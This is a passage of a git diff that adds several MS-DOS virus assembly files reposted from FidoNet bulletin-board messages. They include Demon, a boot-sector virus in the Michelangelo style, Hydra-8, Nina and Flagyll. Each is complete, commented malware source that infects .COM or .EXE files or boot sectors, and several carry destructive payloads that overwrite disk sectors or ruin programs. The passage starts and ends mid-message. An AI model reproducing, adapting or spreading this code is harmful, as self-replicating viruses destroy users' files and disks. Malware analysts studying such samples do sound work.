files are infected. Its about 13K and it will } +{ change the date entry. } + +;-+- CrossPoint v3.02 +; + Origin: The Hamburger Haven 1-318-478-9940 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/A=NNNN Set NewExe segment alignment factor +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir42.asm b/MSDOS/Virus.MSDOS.Unknown.vir42.asm new file mode 100644 index 00000000..88a4a98e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir42.asm @@ -0,0 +1,162 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 32 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : DEMON.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:57) +;* To : Dr T. +;* Subj : DEMON.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Dt: 19-Oct-91 04:19 +;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org +;By: Skin Head +;To: All +;Re: New Source Code + +;========== Demon virus ==================================== 22.09.91 ======== +; +; Assemble and link with: TASM DEMON.VIR +; TLINK DEMON /X/T +; Infect all .COM programs in current directory with: DEMON +; +; !!! NOT ON A TUESDAY !!! +; +;-------------- Constants and structures + +Tuesday = 2 ; INT 21h, AH=2Ah + +Search_Rec struc ; directory search record + db 21 dup (?) ; reserved for DOS + FileAttr db ? ; file attribute + FileTime dw ? ; packed file time + FileDate dw ? ; packed file date + FileSize dd ? ; long file size + FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT +Search_Rec ends + +;-------------- Demon virus segment + +Virus segment + assume cs:Virus,ds:Virus,es:Virus,ss:Virus + + org 0080h +DTA Search_Rec <> ; disk transfer area + + org 0100h +Demon: ; virus entry point +Virus_Size = Virus_End - Demon ; virus size = 272 bytes + + mov dx,offset All_COM ; find first .COM file, + mov ah,4eh ; including hidden/system + mov cx,110bh + int 21h + nop + jnc Infect ; abort if no files found + jmp short Check_Day +Infect: call Replicate ; overwrite first 272 bytes + mov dx,offset DTA + mov ah,4fh ; find next .COM file, + int 21h ; go check day if none found + nop ; else repeat + jnc Next_File + jmp short Check_Day +Next_File: jmp Infect +Check_Day: mov ah,2ah ; get DOS date, check day + int 21h + cmp al,Tuesday ; Tuesday ? + je Thrash_Drive ; if yes, thrash drive C: + mov ah,4ch ; else exit to DOS + int 21h + +Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors + jmp Write_Sectors ; of drive C: with garbage +Write_Sectors: mov al,Drive_C ; Error: doesn't work ! + mov cx,160 ; AL=C:, CX=160 sectors + mov dx,0 ; DX=highest sector in drive ! + mov bx,0 ; DS:BX=start of PSP area + int 26h ; overwrite sectors + inc Counter + cmp Counter,10 ; repeat 10 times + je Show_Msg + jne Write_Sectors +Show_Msg: mov ah,09h ; show a fake error message + mov dx,offset Virus_Msg ; and exit to DOS + int 21h + mov ah,4ch + int 21h + +Replicate: mov dx,offset DTA.FileName ; save file attribute + mov ax,4300h + int 21h + mov COM_Attr,cx + nop + xor cx,cx ; unprotect the .COM file + mov ax,4301h ; in case it's read-only + int 21h + nop + mov ax,3d02h ; open .COM file for R/W, + int 21h ; abort on error + nop + jc Check_Day + mov bx,ax ; BX = file handle + mov ax,5700h + int 21h ; save file date and time + nop + mov COM_Time,cx + mov COM_Date,dx + mov dx,offset Demon ; overwrite first 272 bytes + mov ah,40h ; of .COM program file + mov cx,Virus_Size ; with the virus code + int 21h + nop + mov ax,5701h ; restore file date and time + mov dx,COM_Date + mov cx,COM_Time + int 21h + mov ah,3eh ; close the file + int 21h + nop + mov dx,offset DTA.FileName ; restore file attribute + mov cx,COM_Attr + mov ax,4301h + int 21h + retn + +All_COM db '*.COM',0 ; dir search specification +COM_Date dw 0 ; packed .COM program date +COM_Time dw 0 ; packed .COM program time +COM_Attr dw 0 ; .COM program file attribute +Counter db 0 ; used when thrashing drive C: +Drive_C db 2 ; INT 26h C: drive number + dw 0 +Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)' + dw 0 +Virus_Msg db 10,13,'Error eating drive C:',10,13,'$' + +Virus_End label byte ; virus code+data end + +Virus ends + end Demon + +;-+- FastEcho/386 1.41.b7/Real +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir43.asm b/MSDOS/Virus.MSDOS.Unknown.vir43.asm new file mode 100644 index 00000000..d7b8492c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir43.asm @@ -0,0 +1,251 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 33 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : MICHANGL.A1 +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 16:58) +;* To : Mike Salvino +;* Subj : MICHANGL.A1 +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +obsluha 13h: push ds + push ax + or dl,dl ; drive a: ? + jnz loc_1 ; ak nie, stara obsluha + xor ax,ax ; ak ano, pozri ci motor bezi + mov ds,ax ; (ked bezi, tak by odbiehanie + ; na boot sektor bolo napadne + ; - hrcal by disk, pri zapnuti + ; sa to strati) + test byte ptr ds:[43Fh],1 ; (0000:043F=10h) + jnz loc_1 ; ak bezi, tak stara obsluha + pop ax ; ak nebezi, tak stara obsluha + pop ds + pushf + call dword ptr cs:[0Ah] + pushf ; Push flags + call sub_1 ; rozmnoz sa na a: + popf ; Pop flags + retf 2 ; vrat sa z int s tymito flagmi +loc_1: + pop ax + pop ds + jmp dword ptr cs:[0Ah] ; stara obsluha + +; +; MNOZENIE SA +; + +sub_1 proc near + push ax ; SCHOVAJ REGS + push bx + push cx + push dx + push ds + push es + push si + push di + push cs + pop ds + push cs + pop es + mov si,4 +loc_2: + mov ax,201h ; 1 sektor citaj + mov bx,200h ; za seba (si 512 b. dlhy) + mov cx,1 ; boot sektor (1. na 0. stope) + xor dx,dx ; disk a: + pushf + call dword ptr ds:[0Ah] ; stara obsluha + jnc loc_3 ; error ? + xor ax,ax ; error - disk reset + pushf ; + call dword ptr ds:[0Ah] ; (6C20:000A=0AF1Ah) + dec si + jnz loc_2 ; skus to 4 x + jmp short loc_6 ; a ked nic, vykasli sa na to +loc_3: + xor si,si ; vsetko ok, pokracujeme + cld + lodsw ; porovnaj prve 4 byte z bootu + cmp ax,[bx] ; so sebou, aby si zistil, ci + jne loc_4 ; uz si tam - nakazeny disk + lodsw + cmp ax,[bx+2] + je loc_6 ; ak si tam, netrba infikovat + ; "AIDS staci dostat raz." +loc_4: + mov ax,301h ; avsak ak tam nie si, tak + mov dh,1 ; ten disk nakaz + mov cl,3 ; nastav znacku, kam odlozit + cmp byte ptr [bx+15h],0FDh ; povodny boot + je loc_5 ; (do ktoreho sektora) + mov cl,0Eh ; podla typu diskety +loc_5: ; (0e - HD, 3 - DD, 7 - hard) + mov word ptr ds:[8],cx ; uloz znacku + pushf ; a zapis povodny boot + call dword ptr ds:[0Ah] + jc loc_6 ; error - neda sa - vyskoc von + mov si,3BEh ; dopis originalnu partition + mov di,1BEh ; na svoj koniec + mov cx,21h + cld + rep movsw + mov ax,301h ; a zapis sa do bootu + xor bx,bx + mov cx,1 + xor dx,dx + pushf ; cez staru int 13h + call dword ptr ds:[0Ah] +loc_6: + pop di ; hotovo - koniec + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + retn +sub_1 endp + +START VIRUSU xor ax,ax + mov ds,ax ; DS NA NULU + cli ; Disable interrupts + mov ss,ax ; stack pod seba + mov ax,7C00h ; tu si - natiahol si sa + mov sp,ax ; z bootu - sp pod seba + sti ; Enable interrupts + push ds ; schovaj ds,ax + push ax + mov ax,word ptr ds:[4Ch] ; odloz si staru obsluhu int13h + mov word ptr ds:[7C0Ah],ax + mov ax,word ptr ds:[4Eh] + mov word ptr ds:[7C0Ch],ax + mov ax,word ptr ds:[413h] ; top of memory zmensi o 2K + dec ax + dec ax + mov word ptr ds:[413h],ax + mov cl,6 ; prepocitaj na paragr. adr. + shl ax,cl + mov es,ax ; nastav es + mov word ptr ds:[7C05h],ax ; a odloz si ju sem + mov ax,0Eh ; toto je offset noveho int13h + mov word ptr ds:[4Ch],ax ; nastav ten novy int + mov word ptr ds:[4Eh],es + mov cx,1BEh ; skopiruj sa do vyhr. 2K pam. + mov si,7C00h + xor di,di + cld + rep movsb + jmp dword ptr cs:[7C03h] ; a skoc na seba po skopirovani + xor ax,ax ; sem skocis + mov es,ax ; 0 do es + int 13h ; reset disk a: + push cs ; cs do ds + pop ds + mov ax,201h ; precitaj boot + mov bx,7C00h ; do 7c00 + mov cx,word ptr ds:[8] ; pozri si znacku, kde mas ulo- + ; zeny povodny boot + cmp cx,7 ; ak je to 7 - tak si na harde + jne loc_7 ; inak si na diskete + mov dx,80h ; na harde - c: + int 13h ; precitaj originalny boot + jmp short loc_8 ; a pokracuj +loc_7: + mov cx,word ptr ds:[8] ; precitaj si kde mas boot + mov dx,100h ; z diskety + int 13h + jc loc_8 ; error - nejde to - skonci + push cs ; ak to ide cs do es + pop es + mov ax,201h ; a precitaj si este boot + mov bx,200h ; za seba + mov cx,1 + mov dx,80h ; ale z hardu + int 13h + jc loc_8 ; chyba - von + xor si,si ; porovnaj sa s bootom + cld ; ci je harddisk nakazeny + lodsw + cmp ax,[bx] + jne loc_13 + lodsw + cmp ax,[bx+2] + jne loc_13 ; ak nie je nakazeny - nakaz +loc_8: + xor cx,cx ; 0 do cx + mov ah,4 + int 1Ah ; pozri si datum + ; ci je 6. 3. + cmp dx,306h + je loc_9 ; ak je 6.3. - akcia + retf ; ak nie - von +loc_9: + xor dx,dx ; TOT' UCINOK VIRUSU + mov cx,1 ; zacni na 0. stope a 1. sktr +loc_10: + mov ax,309h ; zapis 9 sektorov + mov si,word ptr ds:[8] ; pozri typ disku + cmp si,3 ; disketa -> rovno zapis + je loc_11 + mov al,0Eh ; HD disketa -> 14 sektorov + cmp si,0Eh + je loc_11 ; a rovno zapis + mov dl,80h ; nie disketa - hard + mov byte ptr ds:[7],4 ; tak nie 2, ale 4 hlavy + mov al,11h ; a 17 sektorov/ track +loc_11: + mov bx,5000h ; zober hocico z pamati + mov es,bx + int 13h ; a zapis na disk + jnc loc_12 ; nie je chyba - pokracuj + xor ah,ah ; chyba - reset disk + int 13h +loc_12: + inc dh ; dalsia hlava ? + cmp dh,byte ptr ds:[7] ; max. headroom + jb loc_10 ; este nie - pokracuj + xor dh,dh ; ano - opat hlava 0 + inc ch ; dalsi track + jmp short loc_10 ; a znova +loc_13: + mov cx,7 ; NAKAZENIE HARDU + mov word ptr ds:[8],cx ; sem uloz povodny boot + mov ax,301h + mov dx,80h + int 13h + jc loc_8 ; error - out + mov si,3BEh ; no error - dopis partition + mov di,1BEh + mov cx,21h + rep movsw + mov ax,301h ; a zapis sa do bootu + xor bx,bx + inc cl + int 13h + jmp short loc_8 ; a chod von + +-+- DinoMail v.1.0 Alpha + + Origin: I just hate people who create virusses... (2:283/718) +============================================================================= + +Yoo-hooo-oo, -! + + + The MeeO + +/Txx Specify output file type + +--- Aidstest Null: /Kill + * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir44.asm b/MSDOS/Virus.MSDOS.Unknown.vir44.asm new file mode 100644 index 00000000..8895e5ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir44.asm @@ -0,0 +1,266 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 34 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : HYDRA_8.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Doug Bryce, 2:283/718 (06 Nov 94 16:59) +;* To : Brad Frazee +;* Subj : HYDRA_8.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org +PAGE 59,132 + +; +; +; HYDRA8 +; +; +; Disassembly by: -=>Wasp<=- aka >>Night Crawler<< +; +; Reassemble with TASM 2.0 +; + +DATA_1E EQU 80H +DATA_16E EQU 1EFH +DATA_17E EQU 1F2H +DATA_18E EQU 9D9AH + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +HYDRA8 PROC FAR + +START: + JMP LOC_2 ; (01E2) + DB 59H, 44H, 00H, 00H +DATA_4 DB 'HyDra-8 Beta - Not For Release' + DB '. *.CO?' + DB 0 +DATA_7 DW 0, 84FCH +DATA_9 DW 0 +DATA_10 DB 0 + DB 29 DUP (0) +DATA_11 DB 0 + DB 0, 0, 0, 0, 0, 0 +DATA_12 DB 0 + DB 0, 0, 0, 0, 0, 0 +COPYRIGHT DB 'Copyright (c)' + DB ' 1991 by C.A.V.E. ' +DATA_13 DB 2AH + DB 2EH, 45H, 58H, 45H, 00H +DATA_14 DB 33H + DB 0C9H, 1EH, 52H,0E8H, 06H, 00H + DB 0E8H, 13H, 00H,0EBH, 36H, 90H + DB 0BEH, 48H, 01H,0BFH, 5AH, 01H + DB 0B9H, 12H, 00H + +LOCLOOP_1: + XOR BYTE PTR [SI],0F5H + MOVSB ; Mov [si] to es:[di] + LOOP LOCLOOP_1 ; Loop if cx > 0 + + RETN + MOV AX,0F00H + INT 10H ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + MOV AH,0 + INT 10H ; Video display ah=functn 00h + ; set display mode in al + MOV AX,200H + MOV DH,0CH + MOV DL,1FH + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + XOR DX,DX ; Zero register + MOV DX,OFFSET DATA_12 + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,18H + MOV DL,0 + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + RETN + MOV AX,4C00H + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code + ADD [BP+SI-6563H],AH + CMC ; Complement carry + PUSHF ; Push flags + XCHG DH,CH + MOV DI,DATA_18E + DB 9BH,0F5H,0B2H, 94H, 99H, 81H + DB 0CAH,0D1H +LOC_2: + PUSH AX + MOV AX,CS + ADD AX,1000H + XOR DI,DI ; Zero register + MOV CX,1EFH + MOV SI,OFFSET DS:[100H] + MOV ES,AX + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + MOV AH,1AH + MOV DX,OFFSET DATA_10 + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + MOV AH,4EH ; 'N' + MOV DX,OFFSET DATA_4+22H + INT 21H ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + JC LOC_6 ; Jump if carry Set +LOC_3: + MOV AH,3DH ; '=' + MOV AL,2 + MOV DX,OFFSET DATA_11 + INT 21H ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + MOV BX,AX + PUSH ES + POP DS + MOV AX,3F00H + MOV CX,0FFFFH + MOV DX,DATA_16E + INT 21H ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + ADD AX,1EFH + MOV CS:DATA_9,AX + CMP WORD PTR DS:DATA_17E,4459H + JNE LOC_4 ; Jump if not equal + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS + MOV AH,4FH ; 'O' + INT 21H ; DOS Services ah=function 4Fh + ; find next filename match + JC LOC_7 ; Jump if carry Set + JMP SHORT LOC_3 ; (0204) +LOC_4: + XOR CX,CX ; Zero register + MOV DX,CX + MOV AX,4200H + INT 21H ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + JC LOC_5 ; Jump if carry Set + MOV AH,40H ; '@' + XOR DX,DX ; Zero register + MOV CX,CS:DATA_9 + INT 21H ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +LOC_5: + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS +LOC_6: + MOV AH,1AH + MOV DX,DATA_1E + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + JMP SHORT LOC_10 ; (02B0) + DB 90H +LOC_7: + CLC ; Clear carry flag + XOR CX,CX ; Zero register + PUSH DS + PUSH DX + MOV AH,1AH + MOV DX,OFFSET DATA_10 + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + MOV DX,OFFSET DATA_13 + MOV AH,4EH ; 'N' + XOR CX,CX ; Zero register + INT 21H ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + JC LOC_6 ; Jump if carry Set +LOC_8: + MOV AH,3CH ; '<' + XOR CX,CX ; Zero register + MOV DX,OFFSET DATA_11 + INT 21H ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + MOV BX,AX + JC LOC_6 ; Jump if carry Set + MOV AX,3D02H + MOV DX,OFFSET DATA_11 + INT 21H ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + MOV BX,AX + CLC ; Clear carry flag + XOR DX,DX ; Zero register + MOV AH,40H ; '@' + MOV DX,OFFSET DATA_14 + MOV CX,5AH + INT 21H ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + CMP AX,5AH + JB LOC_9 ; Jump if below + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + JC LOC_9 ; Jump if carry Set + MOV AH,4FH ; 'O' + INT 21H ; DOS Services ah=function 4Fh + ; find next filename match + JNC LOC_8 ; Jump if carry=0 +LOC_9: + MOV AX,4C00H + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_10: + XOR DI,DI ; Zero register + MOV SI,OFFSET DATA_15 + MOV CX,22H + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + POP BX + MOV CS:DATA_7,0 + MOV WORD PTR CS:DATA_7+2,ES + POP BX + JMP DWORD PTR CS:DATA_7 +DATA_15 DB 1EH + DB 07H,0B9H,0FFH,0FFH,0BEH,0EFH + DB 02H,0BFH, 00H, 01H, 2BH,0CEH + DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H + DB 01H, 00H, 01H, 2EH, 8CH, 1EH + DB 02H, 01H, 8BH,0C3H, 2EH,0FFH + DB 2EH, 00H, 01H,0CDH + DB 20H + +HYDRA8 ENDP + +SEG_A ENDS + + + + END START + +;-+- FidoPCB v1.4 [NR] +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir45.asm b/MSDOS/Virus.MSDOS.Unknown.vir45.asm new file mode 100644 index 00000000..c16a0ee1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir45.asm @@ -0,0 +1,187 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 35 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : NINA.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37) +;* To : Viral Doctor +;* Subj : NINA.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org +.model tiny +.code +org 100h +; Disassembly done by Dark Angel of Phalcon/Skism +; for 40Hex Number 9, Volume 2 Issue 5 +start: + push ax + mov ax,9753h ; installation check + int 21h + mov ax,ds + dec ax + mov ds,ax ; ds->program MCB + mov ax,ds:[3] ; get size word + push bx + push es + sub ax,40h ; reserve 40h paragraphs + mov bx,ax + mov ah,4Ah ; Shrink memory allocation + int 21h + + mov ah,48h ; Allocate 3Fh paragraphs + mov bx,3Fh ; for the virus + int 21h + + mov es,ax ; copy virus to high + xor di,di ; memory + mov si,offset start + 10h ; start at MCB:110h + mov cx,100h ; (same as PSP:100h) + rep movsb + sub ax,10h ; adjust offset as if it + push ax ; originated at 100h + mov ax,offset highentry + push ax + retf + +endfile dw 100h ; size of infected COM file + +highentry: + mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the + ; memory isn't freed when the + ; program terminates + mov ax,3521h ; get int 21h vector + int 21h + + mov word ptr cs:oldint21,bx ; save it + mov word ptr cs:oldint21+2,es + push es + pop ds + mov dx,bx + mov ax,2591h ; redirect int 91h to int 21h + int 21h + + push cs + pop ds + mov dx,offset int21 + mov al,21h ; set int 21h to virus vector + int 21h + + pop ds ; ds->original program PSP + pop bx + push ds + pop es +return_COM: + mov di,100h ; restore original + mov si,endfile ; file + add si,di ; adjust for COM starting + mov cx,100h ; offset + rep movsb + pop ax + push ds ; jmp back to original + mov bp,100h ; file (PSP:100) + push bp + retf +exit_install: + pop ax ; pop CS:IP and flags in + pop ax ; order to balance the + pop ax ; stack and then exit the + jmp short return_COM ; infected COM file +int21: + cmp ax,9753h ; installation check? + je exit_install + cmp ax,4B00h ; execute? + jne exitint21 ; nope, quit + push ax ; save registers + push bx + push cx + push dx + push ds + call infect + pop ds ; restore registers + pop dx + pop cx + pop bx + pop ax +exitint21: + db 0eah ; jmp far ptr +oldint21 dd ? + +infect: + mov ax,3D02h ; open file read/write + int 91h + jc exit_infect + mov bx,ax + mov cx,100h + push cs + pop ds + mov ah,3Fh ; Read first 100h bytes + mov dx,offset endvirus + int 91h + mov ax,word ptr endvirus + cmp ax,'MZ' ; exit if EXE + je close_exit_infect + cmp ax,'ZM' ; exit if EXE + je close_exit_infect + cmp word ptr endvirus+2,9753h ; exit if already + je close_exit_infect ; infected + mov al,2 ; go to end of file + call move_file_pointer + cmp ax,0FEB0h ; exit if too large + ja close_exit_infect + cmp ax,1F4h ; or too small for + jb close_exit_infect ; infection + mov endfile,ax ; save file size + call write + mov al,0 ; go to start of file + call move_file_pointer + mov dx,100h ; write virus + call write +close_exit_infect: + mov ah,3Eh ; Close file + int 91h +exit_infect: + retn + +move_file_pointer: + push dx + xor cx,cx + xor dx,dx + mov ah,42h + int 91h + pop dx + retn + +write: + mov ah,40h + mov cx,100h + int 91h + retn + + db 'Nina' +endvirus: + int 20h ; original COM file + + end start + +;-+- Terminate 1.50/Pro +; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/yx Extended memory swapping +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir46.asm b/MSDOS/Virus.MSDOS.Unknown.vir46.asm new file mode 100644 index 00000000..ef031c36 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir46.asm @@ -0,0 +1,268 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 36 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : FLAGYLL.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38) +;* To : Bill Dirks +;* Subj : FLAGYLL.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org +;FLAGYLL virus - edited for Crypt Newsletter 13 +;FLAGYLL is a memory resident, overwriting virus which +;infects and destroys .EXE files on load. +;It updates the infected files time/date stamps to the time of +;infection so it can easily be followed. +;.EXE's infected by FLAGYLL are destroyed. DOS will either +;refuse to load them or FLAGYLL will become resident +;as they execute. These programs are ruined and can only +;be deleted. Because it is so destructive to files, FLAGYLL cannnot +;pose a threat in the wild, and in this respect, it is much +;inferior to the SUSAN virus included in this issue. + + .radix 16 + cseg segment + model small + assume cs:cseg, ds:cseg, es:cseg + + org 100h + +oi21 equ endflagyll +filelength equ endflagyll - begin +nameptr equ endflagyll+4 +DTA equ endflagyll+8 + + + + + + + +begin: jmp install_flagyll + + + + ; install +install_flagyll: + + mov ax,cs ; reduce memory size + dec ax + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last memory + jne cancel ; block + mov ax,ds:[0003] + sub ax,100 ; decrease memory + mov ds:0003,ax + + +copy_flagyll: + mov bx,ax ; copy to claimed block + mov ax,es ; PSP + add ax,bx ; virus start in memory + mov es,ax + mov cx,offset endflagyll - begin ; cx = length of virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin] ; point to start of virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in memory + + + +hook_21: + + mov ds,cx ; hook interrupt 21h + mov si,0084h ; + mov di,offset oi21 + mov dx,offset check_exec + lodsw + cmp ax,dx ; + je cancel ; exit, if already installed + stosw + movsw + + push es + pop ds + mov ax,2521h ; revector int 21h to virus + int 21h + +cancel: ret + +check_exec: ; look over loaded files + pushf ; for executables + + push es ; push everything onto the + push ds ; stack + push ax + push bx + push dx + + cmp ax,04B00h ; is a file being + ; executed ? + + + jne abort ; no, exit + +do_infect: + call infect ; then try to infect + +abort: ; restore everything + pop dx + pop bx + pop ax + pop ds + pop es + popf + +exit: + ; exit + jmp dword ptr cs:[oi21] + +infect: + jmp over_id ; it's a vanity thing + +note: db '-=[Crypt Newsletter 13]=-' + + +over_id: + + + + mov cs:[name_seg],ds ; this routine + mov cs:[name_off],dx ; essentially grabs + ; the name of the file + cld ; clear direction flags + mov word ptr cs:[nameptr],dx ; save pointer to the filename + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh ; get old DTA + int 21h + push es + push bx + + push cs ; set new DTA + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21h + + call host_ident ; find filename for virus + push di + mov si,offset COM_txt ; is extension 'COM' ? + + mov cx,3 + rep cmpsb + pop di + jz return ; if so, let it pass by + mov si,offset EXE_txt ; is extension .EXE ? + nop + mov cl,3 + rep cmpsb + jnz return + + + +do_exe: ; infect host, destroying it + + mov ax,4300h ; clear attributes + mov ds,cs:[name_seg] + mov dx,cs:[name_off] + int 21h + and cl,0FEh + mov ax,4301h + int 21h + + mov ds,cs:[name_seg] ; open file read/write + mov dx,cs:[name_off] + mov ax,3D02h + int 21h + jc close_file + push cs + pop ds + mov [handle],ax + mov bx,ax + + push cs + pop ds + mov ax,4200h ;set pointer to beginning of host + + push cs + pop ds + mov bx,[handle] ;handle to BX + xor cx,cx + xor dx,dx + int 21h + + + + mov ah,40 ;write to file + mov cx,filelength ;virus length in cx + mov dx,100 ;start write at beginning of Flagyll + int 21h ;do it + +close_file: mov bx,[handle] + mov ah,03Eh ;close file, name -->BX + int 21h + + mov ax,4C00h ;exit to DOS + int 21h + + + + +return: mov ah,1Ah + pop dx ; restore old DTA + pop ds + int 21H + + ret ; let DOS regain control + + +host_ident: les di,dword ptr cs:[nameptr] ; finds filename for + mov ch,0FFh ; host selection + mov al,0 + repnz scasb + sub di,4 + ret + + + + +EXE_txt db 'EXE',0 ; extension masks +COM_txt db 'COM',0 ; for host selection + +name_seg dw ? ;data buffers for +name_off dw ? ; viral use on the fly +handle dw ? + +note2: db 'Flagyll' ; virus name + +endflagyll: + +cseg ends + end begin + +;-+- GEcho 1.10+ +; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/3 Enable 32-bit processing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir47.asm b/MSDOS/Virus.MSDOS.Unknown.vir47.asm new file mode 100644 index 00000000..3a2b70d8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir47.asm @@ -0,0 +1,247 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 37 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 